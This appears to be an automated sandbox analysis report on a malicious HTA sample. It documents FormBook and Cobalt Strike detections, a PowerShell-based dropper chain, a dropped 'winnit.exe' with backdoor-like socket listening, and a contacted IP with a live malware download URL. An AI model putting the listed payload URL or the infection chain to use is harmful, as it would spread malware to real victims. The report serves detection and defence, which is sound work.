Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_00AE4E87
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AF1E06 GetUserNameW, 6_2_00AF1E06
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AE3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 6_2_00AE3F3A
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00AB49A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
OS version to string mapping found (often used in BOTs)
Source: winnit.exe Binary or memory string: WIN_81
Source: winnit.exe Binary or memory string: WIN_XP
Source: winnit.exe Binary or memory string: WIN_XPe
Source: winnit.exe Binary or memory string: WIN_VISTA
Source: winnit.exe Binary or memory string: WIN_7
Source: winnit.exe Binary or memory string: WIN_8
Source: winnit.exe.3.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B26283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 6_2_00B26283
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B26747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 6_2_00B26747
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1570657 Sample: seemejkiss.hta Startdate: 07/12/2024 Architecture: WINDOWS Score: 100 46 Suricata IDS alerts for network traffic 2->46 48 Antivirus detection for URL or domain 2->48 50 Multi AV Scanner detection for dropped file 2->50 52 8 other signatures 2->52 9 mshta.exe 1 2->9         started        process3 signatures4 62 Suspicious command line found 9->62 64 PowerShell case anomaly found 9->64 12 cmd.exe 1 9->12         started        process5 signatures6 66 Detected Cobalt Strike Beacon 12->66 68 Suspicious powershell command line found 12->68 70 PowerShell case anomaly found 12->70 15 powershell.exe 45 12->15         started        20 conhost.exe 12->20         started        process7 dnsIp8 40 107.175.113.196, 49706, 80 AS-COLOCROSSINGUS United States 15->40 32 C:\Users\user\AppData\Roaming\winnit.exe, PE32 15->32 dropped 34 C:\Users\user\AppData\Local\...\win[1].exe, PE32 15->34 dropped 36 C:\Users\user\AppData\...\5zyziwbf.cmdline, Unicode 15->36 dropped 42 Loading BitLocker PowerShell Module 15->42 44 Powershell drops PE file 15->44 22 winnit.exe 2 15->22         started        25 csc.exe 3 15->25         started        file9 signatures10 process11 file12 54 Multi AV Scanner detection for dropped file 22->54 56 Binary is likely a compiled AutoIt script file 22->56 58 Machine Learning detection for dropped file 22->58 60 4 other signatures 22->60 28 svchost.exe 22->28         started        38 C:\Users\user\AppData\Local\...\5zyziwbf.dll, PE32 25->38 dropped 30 cvtres.exe 1 25->30         started        signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
107.175.113.196
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://107.175.113.196/400/win.exe true
  • Avira URL Cloud: malware
 unknown